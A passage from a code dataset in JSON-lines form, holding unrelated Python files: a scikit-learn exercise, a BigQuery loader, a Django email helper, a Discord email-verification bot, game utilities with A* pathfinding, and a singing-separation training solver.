is a DataFrame, y is a Series\n\n\ndef impute_data(x):\n # 1. Handle missing values in the data using an sklearn SimpleImputer. The transformed\n # data should be stored in a numpy array x_imp.\n x_imp = impute.SimpleImputer(missing_values=np.nan, strategy='constant', fill_value=0)\n ans = x_imp.fit_transform(x)\n return ans # x is a numpy.array\n\n\ndef get_class_distrib(class_labels):\n neg, pos = class_labels.value_counts() # 0 -> neg, 1->pos\n return pos, neg # pos and neg are integer counts\n\ndef learn_tree(x, y):\n # 4. Learn a decision tree model and get its accuracy on both the training and test data\n clf = tree.DecisionTreeClassifier()\n clf = clf.fit(x, y)\n return clf # clf is a tree classifier object\n\n\ndef test_model(clf, x, y):\n myans = clf.predict(x)\n theiry = y.to_numpy()\n if len(myans) == len(theiry):\n acc = np.sum(myans == theiry)\n else:\n print(\"Invalid Comparision\")\n return acc/len(myans) # acc is a float\n\n\ndef top_features(clf, col_names, num):\n mylist = [];\n for x,y in zip(col_names, clf.feature_importances_):\n mylist.append((x,y))\n sortedlist = sorted(mylist, key=lambda x: x[1])\n return sortedlist[len(sortedlist)-num:] # feat_scores is a list of (feature name, float) tuples\n\n\ndef learn_knn(x, y, k):\n clf = KNeighborsClassifier(n_neighbors=k)\n clf.fit(x, y)\n return clf # clf is a knn classifier object\n\n\ndef learn_knn_standard(x, y, k):\n stdScaler = StandardScaler()\n clf = KNeighborsClassifier(n_neighbors=k)\n model = Pipeline([('sel', stdScaler), ('clf', clf)])\n pipeline = model.fit(x, y)\n return pipeline # clf is a pipeline object\n\ndef crossval_tree(x, y, folds):\n KNN = KNeighborsClassifier()\n y_pred = cross_val_score(KNN, x, y, cv=folds)\n acc = [x for x in y_pred if x > 0]\n return sum(acc)/len(acc) # acc is a float\n\n\n#########################\n\nif __name__ == '__main__':\n data_file_name = sys.argv[1]\n # data_file_name = 'polish_bankruptcy_data.csv'\n main(data_file_name)\n\n\n\n\n\n\n\n","repo_name":"achen173/Analytics-With-Python","sub_path":"Analytics_using_scikit_learn/polish_bankruptcy.py","file_name":"polish_bankruptcy.py","file_ext":"py","file_size_in_byte":6516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23903879374","text":"from google.cloud import bigquery\nimport pandas as pd\nimport constant\nimport logging\n\nclass bq_load:\n \n def insert_func(ti):\n project_name=constant.PROJECT_NAME #name of the active project in GCP\n dataset_id = constant.DATASET_ID #name of the dataset where the target table lies #VALUES CAN BE FOUND IN CONSTANTS FOLDER\n table_name=constant.TABLE_NAME #name of the table where the data is to be uploaded\n \n client=bigquery.Client() \n table_id=project_name+'.'+dataset_id+'.'+table_name #each table in BQ is refernced using the format - `project_name.dataset_name.table_name`\n\n #returns the filename of the file which triggered the cloud function, this was pushed to xcoms \n file_name=ti.xcom_pull(key='return_value', task_ids=['return_file_name']) \n \n #location of the uploaded file in the GCS bucket\n uri = 'gs://' + 'test_bucket_69420'+ '/' + file_name[0] \n\n #reading the xlsx file from the GCS bucket with the uri and setting the header as the second column of the excel file\n df=pd.read_excel(uri,header=[1]) \n\n\n #START\n #filling the null values with appropriate default values\n df[['Area code','Sub Category','Category']]=(df.loc[:,['Area code','Sub Category','Category']]).fillna('') \n df[['Feature Factors','Unnamed: 6']]=(df.loc[:,['Feature Factors','Unnamed: 6']]).fillna(0)\n df[['Multiplying Factor']]=(df.loc[:,['Multiplying Factor']]).fillna(1)\n df[['Unnamed: 7']]=(df.loc[:,['Unnamed: 7']]).fillna('0,0')\n #END\n\n rows_to_insert=[]\n\n #START\n #reading the excel data row by row an appending it to a list of json values with a fixed schema\n for i in range (1,df.shape[0]):\n x=df.iloc[i,:] # x storeing row data (it changes per run of the loop)\n rows_to_insert.append({ \n \"Contributor\": x[0],\n \"Sub_category\": x[1],\n \"Category\": x[2],\n \"Multiplying_factor\": int(x[3]),\n \"Area_code\": x[4],\n \"Feature_Factors\": {\n \"Feature_1\": x[5],\n \"Feature_2\": x[6],\n \"Feature_3\": [(x[7].split(','))[0],(x[7].split(','))[1]] #splitting Feature_3 wherever there is comma.\n }\n })\n\n\n errors = client.insert_rows_json(table_id, rows_to_insert, row_ids=[None] * len(rows_to_insert)) # Make an API request.\n if errors == []:\n logging.info(\"New rows have been added.\")\n else:\n logging.error(\"Encountered errors while inserting rows: {}\".format(errors))\n\n\nbq_load.insert_func.__doc__=\"\"\"A function that takes filename of the uploaded file which cased the cloud function trigger, \n then transform that file into a pandas datafranme , extracts the value line by line , saves it to a list of json values \n and then performs a batch upload into BigQuery \"\"\"\n\n\n","repo_name":"Adarsh4503/use_case_test","sub_path":"src/dev/dag/upload_to_bq.py","file_name":"upload_to_bq.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38597945107","text":"from dashboard import candidate_module\nfrom business.models import BusinessUser\nfrom beta_invite.models import Campaign\nfrom beta_invite.util import email_sender\nfrom dashboard.models import Candidate\nimport common\n\n\ndef get_campaign_for_dashboard(request, business_user):\n\n campaign_id = request.GET.get('campaign_id')\n if campaign_id:\n return Campaign.objects.get(pk=campaign_id)\n # default campaign\n else:\n return business_user.campaigns.all()[0]\n\n\ndef get_business_user_and_campaign(request, pk):\n business_user = BusinessUser.objects.get(pk=pk)\n campaign = get_campaign_for_dashboard(request, business_user)\n return business_user, campaign\n\n\ndef get_checked_box_candidates(campaign_id, request):\n candidates = Candidate.objects.filter(campaign_id=campaign_id)\n return [c for c in candidates if request.GET.get('{}_checkbox'.format(c.id))]\n\n\ndef send_email_from_dashboard(request, campaign):\n\n # enters here when sending an email\n if request.GET.get('send_mail') is not None:\n\n candidates = get_checked_box_candidates(campaign.id, request)\n\n email_sender.send(objects=candidates,\n language_code='es',\n body_input=request.GET.get('email_body'),\n subject=request.GET.get('email_subject'),\n with_localization=False,\n body_is_filename=False)\n","repo_name":"palaciossruben/acerto","sub_path":"testing_webpage/business/dashboard_module.py","file_name":"dashboard_module.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14903039759","text":"from nextcord.ext import commands, application_checks\nfrom nextcord import Member\nimport mysql.connector\nimport hashlib\nimport boto3\nfrom settings import *\nimport sentry_sdk\n\nsentry_sdk.init(\n dsn=\"https://88e20802832b5ef426b1bb1c03a407f0@o4506112163643392.ingest.sentry.io/4506112169345024\",\n # Set traces_sample_rate to 1.0 to capture 100%\n # of transactions for performance monitoring.\n traces_sample_rate=1.0,\n # Set profiles_sample_rate to 1.0 to profile 100%\n # of sampled transactions.\n # We recommend adjusting this value in production.\n profiles_sample_rate=1.0,\n)\n\nses_client = boto3.client('ses', region_name=\"ca-central-1\", aws_access_key_id=SES_PUB, aws_secret_access_key=SES_PRIV)\n\nbot = commands.Bot()\n\n@bot.slash_command(description=\"Force verify a user!\")\n@application_checks.has_permissions(manage_messages=True)\nasync def force_verify(i, member: Member, email: str):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n role = i.guild.get_role(VERIFIED_ROLE)\n await member.add_roles(role, reason=email)\n query = \"\"\"INSERT INTO users (discord_id, cmail) VALUES (%s,%s);\"\"\"\n data = (member.id, email)\n cursor.execute(query, data)\n connection.commit()\n cursor.close()\n connection.close()\n await i.send(\"Force verified member!\", ephemeral=True)\n\n@bot.slash_command(description=\"Gets a member's cmail\")\n@application_checks.has_permissions(manage_messages=True)\nasync def get_email(i, member: Member):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n query = \"\"\"SELECT cmail FROM users WHERE discord_id=%s;\"\"\"\n data = (member.id,)\n cursor.execute(query, data)\n data = cursor.fetchone()\n cursor.close()\n connection.close()\n if data is None:\n await i.send(\"No cmail address found!\", ephemeral=True)\n else:\n await i.send(\"cmail: \" + data[0].decode(), ephemeral=True)\n\n@bot.slash_command(description=\"Verifies your account and gives you access to the server!\")\nasync def verify(i, cmail: str):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n if not cmail.endswith(\"@cmail.carleton.ca\"):\n await i.send(\"Error: You must use a Carleton University email address!\", ephemeral=True)\n return\n query = \"SELECT * FROM banned WHERE cmail=%s;\"\n cursor.execute(query, (cmail,))\n user = cursor.fetchone()\n if user is not None:\n await i.send(\"Error: You have been banned from this server!\", ephemeral=True)\n channel = i.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"Warning: User (\" + i.user.mention + \" - \" + cmail + \") tried to join but they are banned!\")\n cursor.close()\n connection.close()\n return\n query = \"SELECT * FROM users WHERE discord_id=%s OR cmail=%s;\"\n cursor.execute(query, (i.user.id,cmail))\n user = cursor.fetchone()\n if user is not None:\n await i.send(\"Error: You have already joined this server!\", ephemeral=True)\n channel = i.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"Warning: User (\" + i.user.mention + \" - \" + cmail + \") tried to join multiple times!\")\n cursor.close()\n connection.close()\n return\n m = hashlib.sha256()\n hstr = HASH_PREFIX + cmail\n m.update(hstr.encode('utf-8'))\n h = m.hexdigest()[0:8]\n message = \"Your verification code is: \" + h\n send_args = {\n 'Source': FROM,\n 'Destination': {\n 'ToAddresses': [\n cmail,\n ],\n },\n 'Message': {\n 'Subject': {'Data': \"Discord Verification Code\"},\n 'Body': {'Text': {'Data': message}, 'Html': {'Data': message}}}}\n ses_client.send_email(**send_args)\n cursor.close()\n connection.close()\n await i.send(\"A verification code has been sent to your email. It will be in your spam folder. Use `/verify_complete ` to become verified!\", ephemeral=True)\n\n@bot.slash_command(description=\"Verifies your account and gives you access to the server!\")\nasync def verify_complete(i, cmail: str, code: str):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n m = hashlib.sha256()\n hstr = HASH_PREFIX + cmail\n m.update(hstr.encode('utf-8'))\n h = m.hexdigest()[0:8]\n if h.lower() == code.lower():\n member = i.user\n role = i.guild.get_role(VERIFIED_ROLE)\n await member.add_roles(role, reason=cmail)\n query = \"\"\"INSERT INTO users (discord_id, cmail) VALUES (%s,%s);\"\"\"\n data = (member.id, cmail)\n cursor.execute(query, data)\n connection.commit()\n await i.send(\"Successfully verified!\", ephemeral=True)\n cursor.close()\n connection.close()\n return\n else:\n channel = i.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"Warning: User (\" + i.user.mention + \" - \" + cmail +\") failed to verify, please manually review!\")\n await i.send(\"Failed to verify, moderators have been notified and will manually approve\", ephemeral=True)\n cursor.close()\n connection.close()\n return\n\n\n@bot.event\nasync def on_ready():\n print('Ready!')\n\n@bot.event\nasync def on_error(event):\n channel = event.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"An error occurred!!!\\n\" + event)\n\n@bot.event\nasync def on_member_ban(guild, user):\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n channel = guild.get_channel(INFO_CHANNEL)\n query = \"SELECT stud_id FROM users WHERE discord_id=%s;\"\n cursor.execute(query, (user.id,))\n u = cursor.fetchone()\n if u is None:\n await channel.send(\"Warning: User (\" + user.mention + \") was banned but no matching student id was found!\")\n return\n stud_id = u[0]\n query = \"\"\"INSERT INTO banned (stud_id) VALUES (%s);\"\"\"\n data = (stud_id,)\n cursor.execute(query, data)\n connection.commit()\n cursor.close()\n connection.close()\n await channel.send(\"Info: User (\" + user.mention + \") was banned!\")\n\n@bot.event\nasync def on_member_unban(guild, user):\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n channel = guild.get_channel(INFO_CHANNEL)\n query = \"SELECT stud_id FROM users WHERE discord_id=%s;\"\n cursor.execute(query, (user.id,))\n u = cursor.fetchone()\n if u is None:\n await channel.send(\"Warning: User (\" + user.mention + \") was banned but no matching student id was found!\")\n return\n stud_id = u[0]\n query = \"\"\"DELETE FROM banned WHERE stud_id=%s;\"\"\"\n data = (stud_id,)\n cursor.execute(query, data)\n connection.commit()\n cursor.close()\n connection.close()\n await channel.send(\"Info: User (\" + user.mention + \") was unbanned!\")\n\nbot.run(TOKEN)\n","repo_name":"carleton-student-engineering-society/BITSocBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3284623008","text":"#!usr/bin/python3\r\n# -*-coding: utf-8 -*-\r\n\r\nimport pickle\r\n\r\n\r\nclass Define(object):\r\n INF = float(\"inf\")\r\n\r\n\r\ndef sgn(num):\r\n if num > 0:\r\n return 1\r\n elif num < 0:\r\n return -1\r\n else:\r\n return 0\r\n\r\n\r\ndef save_byte(obj, file_path):\r\n with open(file_path, \"wb\") as f:\r\n pickle.dump(obj, f)\r\n\r\n\r\ndef load_byte(file_path):\r\n try:\r\n with open(file_path, \"rb\") as f:\r\n return pickle.load(f)\r\n except FileNotFoundError:\r\n return False\r\n\r\n\r\ndef double_range(*args):\r\n if len(args) == 2:\r\n for i in range(args[0]):\r\n for j in range(args[1]):\r\n yield (i, j)\r\n elif len(args) == 4:\r\n for i in range(args[0], args[1]):\r\n for j in range(args[2], args[3]):\r\n yield (i, j)\r\n elif len(args) == 6:\r\n for i in range(args[0], args[1], args[2]):\r\n for j in range(args[3], args[4], args[5]):\r\n yield (i, j)\r\n else:\r\n raise TypeError(\"double_range expected 2 or 4 or 6 arguments, got %d\" % len(args))\r\n\r\n\r\ndef log10(num):\r\n return len(str(int(num)))\r\n\r\n\r\nclass Pos(object):\r\n \"\"\"\r\n Pos Object -- deal with position\r\n \"\"\"\r\n direction = [(0, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0)]\r\n r_direction = {(0, 0): 0, (-1, 1): 1, (0, 1): 2,\r\n (1, 1): 3, (1, 0): 4, (1, -1): 5,\r\n (0, -1): 6, (-1, -1): 7, (-1, 0): 8}\r\n\r\n def __init__(self, x, y, width=Define.INF, height=Define.INF):\r\n self._x, self._y = None, None\r\n self.width = width\r\n self.height = height\r\n self.x, self.y = x, y\r\n\r\n def __add__(self, other):\r\n assert isinstance(other, tuple), \"Pos object can only add tuple\"\r\n return Pos(self.x + other[0], self.y + other[1], self.width, self.height)\r\n\r\n def __eq__(self, other):\r\n if (self.x, self.y, self.width, self.height) == (other.x, other.y, other.width, other.height):\r\n return True\r\n else:\r\n return False\r\n\r\n def area(self):\r\n for dx, dy in Pos.direction:\r\n yield self.limit_x(dx + self.x), self.limit_y(dy + self.y)\r\n\r\n def limit_x(self, arg):\r\n if arg >= self.width:\r\n arg -= self.width\r\n elif arg < 0:\r\n arg += self.width\r\n return arg\r\n\r\n def limit_y(self, arg):\r\n if arg >= self.height:\r\n arg -= self.height\r\n elif arg < 0:\r\n arg += self.height\r\n return arg\r\n\r\n @property\r\n def x(self):\r\n return self._x\r\n\r\n @x.setter\r\n def x(self, arg):\r\n self._x = self.limit_x(arg)\r\n\r\n @property\r\n def y(self):\r\n return self._y\r\n\r\n @y.setter\r\n def y(self, arg):\r\n self._y = self.limit_y(arg)\r\n\r\n @staticmethod\r\n def get_direction(index):\r\n return Pos.direction[index]\r\n\r\n @staticmethod\r\n def get_direction_index(dx, dy):\r\n return Pos.direction.index((dx, dy))\r\n\r\n\r\nclass Calculate(object):\r\n \"\"\"\r\n Calculate Object -- including some calculation function\r\n \"\"\"\r\n @staticmethod\r\n def find_way_area(x, y):\r\n for ele in [(-1, -1, 3), (0, -1, 2), (1, -1, 3), (1, 0, 2),\r\n (1, 1, 3), (0, 1, 2), (-1, 1, 3), (-1, 0 ,2)]:\r\n yield x + ele[0], y + ele[1], ele[2]\r\n\r\n # # using A* algorithm\r\n @staticmethod\r\n def find_way(map_data, current_x, current_y, target_x, target_y):\r\n # # map_data: 0 means no obstacle, >0 means certain cost obstacle(2 is one tiles cost),\r\n # -1 means obstacle cannot pass\r\n # # do_data: A star point data, a dict of parent, G, H\r\n # # return: if found return next direction, else return 0\r\n assert isinstance(map_data, list)\r\n width = len(map_data)\r\n height = len(map_data[0])\r\n do_data = [[{\"X\": x, \"Y\": y, \"H\": 2 * (abs(target_x - x) + abs(target_y - y)), \"G\": 0, \"P\": None}\r\n for y in range(height)] for x in range(width)]\r\n open_list = [do_data[current_x][current_y]]\r\n close_list = []\r\n current_tile = do_data[current_x][current_y]\r\n while open_list and (do_data[target_x][target_y] is not current_tile):\r\n current_tile = None\r\n for ele in open_list:\r\n if not current_tile or ele[\"H\"] + ele[\"G\"] < current_tile[\"H\"] + current_tile[\"G\"]:\r\n current_tile = ele\r\n try:\r\n open_list.remove(current_tile)\r\n except ValueError:\r\n print(open_list)\r\n print(current_tile)\r\n raise\r\n close_list.append(current_tile)\r\n for x, y, d in Calculate.find_way_area(current_tile[\"X\"], current_tile[\"Y\"]):\r\n if 0 <= x < width and 0 <= y < height:\r\n if do_data[x][y] in close_list or map_data[x][y] < 0:\r\n continue\r\n elif do_data[x][y] not in open_list:\r\n open_list.append(do_data[x][y])\r\n do_data[x][y][\"G\"] = d + current_tile[\"G\"]\r\n do_data[x][y][\"P\"] = current_tile\r\n else:\r\n if d + current_tile[\"G\"] < do_data[x][y][\"G\"]:\r\n do_data[x][y][\"G\"] = d + current_tile[\"G\"]\r\n do_data[x][y][\"P\"] = current_tile\r\n\r\n if open_list:\r\n try:\r\n while current_tile[\"P\"] and current_tile[\"P\"] is not do_data[current_x][current_y]:\r\n current_tile = current_tile[\"P\"]\r\n return Pos.r_direction[(current_tile[\"X\"] - current_x, current_tile[\"Y\"] - current_y)]\r\n except TypeError:\r\n print(current_tile)\r\n raise\r\n else:\r\n return 0\r\n\r\n","repo_name":"Sanvenir/Sanvenirtin","sub_path":"Sanvenirtin/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37923634830","text":"import time\nimport json\n\nimport torch\nimport torch.nn as nn\nfrom asteroid.losses import (\n PITLossWrapper,\n pairwise_neg_sisdr,\n pairwise_neg_sdsdr,\n PairwiseNegSDR,\n)\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport torch.distributed as dist\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.nn.parallel.distributed import DistributedDataParallel as DDP\nimport wandb\nfrom ema_pytorch import EMA\n\nfrom . import utils\nfrom .models import load_model_with_args\nfrom .losses import (\n SingleSrcMultiScaleSpectral_modified,\n SingleSrcMultiScaleSpectral_TRUnet,\n SingleSrcMultiScaleSpectral_TRUNet_freq,\n SingleSrcMultiScaleSpectral_L1,\n SingleSrcMultiScaleSpectral_L1_above_freq,\n)\nfrom .data import (\n DuetSingingSpeechMixTraining,\n DuetSingingSpeechMixValidation,\n MultiSingingSpeechMixTraining,\n MultiSingingSpeechMixValidation,\n)\n\n\nclass Solver(object):\n def __init__(self):\n pass\n\n def set_gpu(self, args):\n if args.use_wandb and args.gpu == 0:\n if args.sweep:\n wandb.init(\n entity=args.entity,\n project=args.project,\n config=args,\n resume=True if args.resume != None and args.gpu == 0 else False,\n )\n else:\n wandb.init(\n entity=args.entity,\n project=args.project,\n name=f\"{args.exp_name}_{args.gpu}\",\n group=\"singing_sep\",\n config=args,\n resume=False,\n settings=wandb.Settings(start_method=\"fork\"),\n )\n\n ###################### Define Models ######################\n trainable_params = []\n # load model\n self.model = load_model_with_args(args)\n if args.mixture_consistency == \"sfsrnet\":\n total_params = list(self.model.masker.parameters())\n sr_net_params = list(self.model.sr_net.parameters())\n trainable_params = [\n {\"params\": sr_net_params, \"lr\": args.lr},\n {\"params\": total_params, \"lr\": args.lr},\n ]\n else:\n trainable_params = trainable_params + list(self.model.parameters())\n\n if args.optimizer == \"sgd\":\n self.optimizer = torch.optim.SGD(\n params=trainable_params,\n lr=args.lr,\n momentum=0.9,\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n elif args.optimizer == \"adamw\":\n self.optimizer = torch.optim.AdamW(\n params=trainable_params,\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n eps=args.eps,\n amsgrad=False,\n weight_decay=args.weight_decay,\n )\n elif args.optimizer == \"radam\":\n self.optimizer = torch.optim.RAdam(\n params=trainable_params,\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n elif args.optimizer == \"adam\":\n self.optimizer = torch.optim.Adam(\n params=trainable_params,\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n else:\n print(\"no optimizer loaded\")\n raise NotImplementedError\n\n if args.lr_scheduler == \"step_lr\":\n self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n self.optimizer,\n mode=\"min\",\n factor=args.lr_decay_gamma,\n patience=args.lr_decay_patience,\n cooldown=0,\n min_lr=5e-5,\n verbose=True,\n )\n elif args.lr_scheduler == \"cos_warmup\":\n self.scheduler = utils.CosineAnnealingWarmUpRestarts(\n self.optimizer, T_0=40, T_mult=1, eta_max=args.lr, T_up=10, gamma=0.5\n )\n\n torch.cuda.set_device(args.gpu)\n\n self.model = self.model.to(f\"cuda:{args.gpu}\")\n\n ############################################################\n # Define Loss\n self.criterion = {}\n self.criterion[\"L1\"] = nn.L1Loss().to(args.gpu)\n self.criterion[\"si_sdr\"] = pairwise_neg_sisdr.to(args.gpu)\n self.criterion[\"snr\"] = PairwiseNegSDR(\"snr\", EPS=args.eps).to(args.gpu)\n self.criterion[\"mse\"] = nn.MSELoss().to(args.gpu)\n self.criterion[\"bce\"] = nn.BCEWithLogitsLoss().to(args.gpu)\n\n if args.mixed_precision:\n pairwise_neg_sisdr_ = PairwiseNegSDR(\"sisdr\", EPS=args.eps)\n self.criterion[\"pit_si_sdr\"] = PITLossWrapper(\n pairwise_neg_sisdr_, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n self.criterion[\"pit_sd_sdr\"] = PITLossWrapper(\n pairwise_neg_sisdr_, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n\n pairwise_neg_snr_ = PairwiseNegSDR(\"snr\", EPS=args.eps)\n self.criterion[\"pit_snr\"] = PITLossWrapper(\n pairwise_neg_snr_, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n\n else:\n self.criterion[\"pit_si_sdr\"] = PITLossWrapper(\n pairwise_neg_sisdr, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n self.criterion[\"pit_sd_sdr\"] = PITLossWrapper(\n pairwise_neg_sdsdr, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n\n pairwise_neg_snr_ = PairwiseNegSDR(\"snr\")\n self.criterion[\"pit_snr\"] = PITLossWrapper(\n pairwise_neg_snr_, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n\n # Spectral loss\n self.criterion[\"multi_spectral_l1\"] = SingleSrcMultiScaleSpectral_L1(\n loss_scale=100.0,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(args.gpu)\n self.criterion[\n \"multi_spectral_l1_above_freq\"\n ] = SingleSrcMultiScaleSpectral_L1_above_freq(\n loss_scale=100.0,\n sample_rate=args.sample_rate,\n above_freq=args.above_freq,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(\n args.gpu\n )\n\n self.criterion[\"pit_multi_spectral_l1\"] = PITLossWrapper(\n self.criterion[\"multi_spectral_l1\"], pit_from=\"pw_pt\"\n ).to(args.gpu)\n self.criterion[\"multi_spectral\"] = SingleSrcMultiScaleSpectral_modified().to(\n args.gpu\n )\n self.criterion[\"multi_spectral_trunet\"] = SingleSrcMultiScaleSpectral_TRUnet(\n loss_scale=0.01,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(args.gpu)\n self.criterion[\n \"multi_spectral_trunet_above_freq\"\n ] = SingleSrcMultiScaleSpectral_TRUNet_freq(\n loss_scale=0.01,\n sample_rate=args.sample_rate,\n above_freq=args.above_freq,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(\n args.gpu\n )\n\n self.es = utils.EarlyStopping(patience=args.patience)\n self.stop = False\n\n if args.use_wandb and args.gpu == 0:\n wandb.watch(self.model, log=\"all\")\n\n self.start_epoch = 1\n self.train_losses = []\n self.valid_losses = []\n self.train_times = []\n self.best_epoch = 0\n\n if args.resume and not args.ema:\n self.resume(args)\n\n # Distribute models to machine\n self.model = DDP(\n self.model,\n device_ids=[args.gpu],\n output_device=args.gpu,\n find_unused_parameters=True,\n )\n\n if args.ema:\n self.model_ema = EMA(\n self.model,\n beta=0.999,\n update_after_step=100,\n update_every=10,\n )\n\n if args.resume and args.ema:\n self.resume(args)\n\n ###################### Define data pipeline ######################\n args.batch_size = int(args.batch_size / args.ngpus_per_node)\n self.mp_context = torch.multiprocessing.get_context(\"fork\")\n if args.dataset == \"singing_librispeech\":\n self.train_dataset = DuetSingingSpeechMixTraining(\n singing_data_dir=args.train_root,\n speech_data_dir=args.speech_train_root,\n song_length_dict_path=args.song_length_dict_path,\n same_song_dict_path=args.same_song_dict_path,\n same_singer_dict_path=args.same_singer_dict_path,\n same_speaker_dict_path=args.same_speaker_dict_path,\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n unison_prob=args.unison_prob,\n pitch_formant_augment_prob=args.pitch_formant_augment_prob,\n augment=True,\n part_of_data=args.part_of_data,\n reduced_training_data_ratio=args.reduced_training_data_ratio,\n sing_sing_ratio=args.sing_sing_ratio,\n sing_speech_ratio=args.sing_speech_ratio,\n same_song_ratio=args.same_song_ratio,\n same_singer_ratio=args.same_singer_ratio,\n same_speaker_ratio=args.same_speaker_ratio,\n # speech_speech_ratio=args.speech_speech_ratio\n )\n self.valid_dataset = []\n for valid_data_path_list in args.valid_root:\n self.valid_dataset.append(\n DuetSingingSpeechMixValidation(\n data_dir=[valid_data_path_list],\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n augment=True,\n )\n )\n elif args.dataset == \"multi_singing_librispeech\":\n self.train_dataset = MultiSingingSpeechMixTraining(\n singing_data_dir=args.train_root,\n speech_data_dir=args.speech_train_root,\n song_length_dict_path=args.song_length_dict_path,\n same_song_dict_path=args.same_song_dict_path,\n same_singer_dict_path=args.same_singer_dict_path,\n same_speaker_dict_path=args.same_speaker_dict_path,\n min_n_src=args.min_n_src,\n max_n_src=args.max_n_src,\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n unison_prob=args.unison_prob,\n pitch_formant_augment_prob=args.pitch_formant_augment_prob,\n augment=True,\n part_of_data=args.part_of_data,\n reduced_training_data_ratio=args.reduced_training_data_ratio,\n sing_sing_ratio=args.sing_sing_ratio,\n sing_speech_ratio=args.sing_speech_ratio,\n same_song_ratio=args.same_song_ratio,\n same_singer_ratio=args.same_singer_ratio,\n same_speaker_ratio=args.same_speaker_ratio,\n # speech_speech_ratio=args.speech_speech_ratio\n )\n self.valid_dataset = []\n for valid_data_path_list in args.valid_root_orpit:\n self.valid_dataset.append(\n MultiSingingSpeechMixValidation(\n data_dir=[valid_data_path_list],\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n augment=True,\n )\n )\n\n self.train_sampler = DistributedSampler(\n self.train_dataset, shuffle=True, rank=args.gpu\n )\n self.train_loader = torch.utils.data.DataLoader(\n self.train_dataset,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.nb_workers,\n multiprocessing_context=self.mp_context,\n pin_memory=True,\n sampler=self.train_sampler,\n drop_last=False,\n worker_init_fn=utils.worker_init_fn,\n persistent_workers=True,\n )\n self.valid_sampler = []\n self.valid_loader = []\n for i, valid_dataset_ in enumerate(self.valid_dataset):\n self.valid_sampler.append(\n DistributedSampler(valid_dataset_, shuffle=False, rank=args.gpu)\n )\n self.valid_loader.append(\n torch.utils.data.DataLoader(\n valid_dataset_,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.nb_workers,\n multiprocessing_context=self.mp_context,\n pin_memory=False,\n sampler=self.valid_sampler[i],\n drop_last=False,\n )\n )\n\n if args.mixed_precision:\n self.scaler = torch.cuda.amp.GradScaler()\n\n def train(self, args, epoch):\n self.end = time.time()\n self.model.train()\n self.train_sampler.set_epoch(epoch)\n\n # get current learning rate\n for param_group in self.optimizer.param_groups:\n current_lr = param_group[\"lr\"]\n\n if (\n args.rank % args.ngpus_per_node == 0\n ): # when the last rank process is finished\n print(f\"Epoch {epoch}, Learning rate: {current_lr}\")\n\n losses = utils.AverageMeter()\n loss_logger = {}\n\n loss_logger[\"epoch-wise-train/train loss\"] = 0\n # with torch.autograd.detect_anomaly(): # use this if you want to detect anomaly behavior while training.\n for i, values in enumerate(self.train_loader):\n mixture, clean = values\n\n mixture = mixture.cuda(args.gpu, non_blocking=True)\n clean = clean.cuda(args.gpu, non_blocking=True)\n\n target = clean\n\n if args.mixed_precision:\n with torch.cuda.amp.autocast():\n if args.mixture_consistency == \"sfsrnet\":\n estimates = self.model.module.forward_pre(mixture)\n else:\n estimates = self.model(mixture)\n else:\n if args.mixture_consistency == \"sfsrnet\":\n estimates = self.model.module.forward_pre(mixture)\n else:\n estimates = self.model(mixture)\n\n loss_input = 